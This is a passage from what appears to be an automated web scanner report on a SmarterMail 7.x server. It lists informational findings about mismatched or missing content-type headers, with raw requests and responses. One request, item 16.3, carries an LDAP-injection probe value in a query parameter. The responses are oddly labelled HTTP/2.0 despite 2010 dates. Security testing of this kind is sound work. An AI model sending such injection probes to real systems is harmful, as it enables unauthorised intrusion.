X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 25908

11|updatePanel|ctl00_UpdatePanel1|
               
           |3645|updatePanel|ctl00_MPH_splitter1_paneMobileDescription_UpdatePanel1|
                           <div class='DeviceWrapper'><div class='DeviceName'>Apple iPod and iPhone<
...[SNIP]...

15.6. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/PluploadReceiver.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /UserControls/ThirdPartyComponents/PluploadReceiver.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /UserControls/ThirdPartyComponents/PluploadReceiver.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:29 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 49
Connection: Close

{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

16. Content type is not specified  previous
There are 44 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


16.1. http://vulnerable.SmarterMail 7.x.host:9998//  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   //

Request

GET // HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.2. http://vulnerable.SmarterMail 7.x.host:9998//Main/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   //Main/

Request

GET //Main/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.3. http://vulnerable.SmarterMail 7.x.host:9998//Main/frmEmptyPreviewOuter.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   //Main/frmEmptyPreviewOuter.aspx

Request

GET //Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1293362628","TopBarSection":"UserStorage","RootLPSize":300}

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:41:32 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.4. http://vulnerable.SmarterMail 7.x.host:9998//Main/frmStoredFiles.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   //Main/frmStoredFiles.aspx

Request

GET //Main/frmStoredFiles.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:54 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.5. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/ButtonBarIcons.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/ButtonBarIcons.xml

Request

GET /App_Themes/Default/ButtonBarIcons.xml HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-wei
...[SNIP]...

16.6. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Skin.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Skin.xml

Request

GET /App_Themes/Default/Skin.xml HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-wei
...[SNIP]...

16.7. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Alerts/frmAlert.aspx

Request

POST /Main/Alerts/frmAlert.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13532

ctl00%24MPH%24conditiontype_subject=DoesNotEqual&__LASTFOCUS=&ctl00%24MPH%24conditiontype_timeofday=Outside&ctl00%24MPH%24enabled_location=on&ctl00%24MPH%24condition_subject=555-555-0199@example.com&c
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:51 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:51 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.8. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlertPopup.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Alerts/frmAlertPopup.aspx

Request

POST /Main/Alerts/frmAlertPopup.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlertPopup.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7575

__VIEWSTATE=%2fwEPDwUKMTk5OTU5MTIzMw8WBh4IX19fVGl0bGUFDVJlbWluZGVycyAoMCkeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFggCBQ9kFgICAQ9kFgICAQ9kFgJmD2QWAgIBD2QWAgIBDxYCHgdWaXNpYmxlZ2
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:52 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:52 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html;
...[SNIP]...

16.9. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmEvent.aspx

Request

POST /Main/Calendar/frmEvent.aspx?popup=true HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx?popup=true#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}; ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55
Content-Length: 26574

ctl00%24ScriptManager1=ctl00%24MPH%24ctl00%7Cctl00%24MPH%24lnkRefresh&__LASTFOCUS=&__EVENTTARGET=ctl00%24MPH%24lnkRefresh&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTE5MDk3MzY0MA8WCh4IX19fVGl0bGUFC015IEN
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:22:14 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:22:14 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain;
...[SNIP]...

16.10. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmOverview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmOverview.aspx

Request

POST /Main/Calendar/frmOverview.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmOverview.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 16603

ctl00_MPH_RadSplitter1_ClientState=&__VIEWSTATE=%2fwEPDwULLTE2MzI2MDcxMzkPFgYeCF9fX1RpdGxlBSZNeSBDYWxlbmRhciAtIEZyaWRheSwgT2N0b2JlciAwMSwgMjAxMB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:14 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:15 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.11. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/javascript:OpenMasterCategoriesPopup()  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/javascript:OpenMasterCategoriesPopup()

Request

GET /Main/Calendar/javascript:OpenMasterCategoriesPopup() HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx?popup=true
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:58 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.12. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAdvancedSearchResults.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmAdvancedSearchResults.aspx

Request

POST /Main/frmAdvancedSearchResults.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAdvancedSearchResults.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7317

ctl00_MPH_ContactGrid_HiddenLSR=&__VIEWSTATE=%2fwEPDwUJODU0MzcxNDI3DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8Da
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:53 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:53 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.13. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmCalendar.aspx

Request

POST /Main/frmCalendar.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14504

ctl00%24TPH%24tsTabs%24SelectedTab=ctl00_TPH_tsTabs_tabDaily&ctl00%24MPH%24hfNewDate=&ctl00_TitleBar_menuCalendarSourceTitle_menuCalendarSource_menuSourceSelf_CB=on&ctl00$MPH$btnNavLeft.x=1&ctl00$MPH$
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:47 GMT
Content-Length: 0

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:48 GMT
X-AspNet-Version: 2.0.50727
Location: /frmError.aspx?aspxerrorpath=/Main/frmCalendar.aspx
Cache-Control:
...[SNIP]...

16.14. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendarSettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmCalendarSettings.aspx

Request

POST /Main/frmCalendarSettings.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendarSettings.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 56817

ctl00_MPH_tfTuesday_SettingText1_ClientState=&ctl00%24MPH%24tfSunday_SettingText1%24dateInput=2010-10-01-08-00-00&ctl00_MPH_tfMonday_SettingText1_timeView_ClientState=&ctl00%24MPH%24tfThursday_Setting
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:24 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:24 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.15. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCompose.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmCompose.aspx

Request

POST /Main/frmCompose.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCompose.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7487

ctl00_BPH_menuActions_menuFlags_menuFollowUp_CB=on&ctl00%24MPH%24VisiblePage=ctl00_MPH_pvCompose&ctl00_MPH_RadText_dialogOpener_Window_ClientState=&ctl00%24MPH%24txtBCC=555-555-0199@example.com&ctl00%
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:56 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:56 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.16. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmContact.aspx

Request

POST /Main/frmContact.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContact.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 17072

ctl00%24MPH%24wucContactInfo%24txtCompanyZip_SettingText=Wiener+Consulting&ctl00%24MPH%24wucContactInfo%24txtPersonNameTitle_SettingText=Peter+Wiener&__LASTFOCUS=&ctl00%24MPH%24wucContactInfo%24txtEma
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:58 GMT
Content-Length: 0

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:58 GMT
X-AspNet-Version: 2.0.50727
Location: /frmError.aspx?aspxerrorpath=/Main/frmContact.aspx
Cache-Control:
...[SNIP]...

16.17. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContentFilters.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmContentFilters.aspx

Request

POST /Main/frmContentFilters.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContentFilters.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 4996

ctl00_MPH_HyperGrid1_HiddenInput=&__VIEWSTATE=%2fwEPDwUKMTU4ODUzMTE0MA8WCh4IX19fVGl0bGUFEUNvbnRlbnQgRmlsdGVyaW5nHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeDlZTX0RvbWFpbkxldmVsaB4EX3NHRmcWAmYP
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:26 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:26 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.18. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmFolderAutoClean.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmFolderAutoClean.aspx

Request

POST /Main/frmFolderAutoClean.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmFolderAutoClean.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 5413

ctl00_MPH_HyperGrid1_HiddenInput=&__VIEWSTATE=%2fwEPDwUKLTIwNTk5OTUyMA8WCh4IX19fVGl0bGUFEUZvbGRlciBBdXRvLUNsZWFuHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeDlZTX0RvbWFpbkxldmVsaB4EX3NHRmcWAmYP
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:27 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:27 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.19. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMessage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMessage.aspx

Request

POST /Main/frmMessage.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMessage.aspx
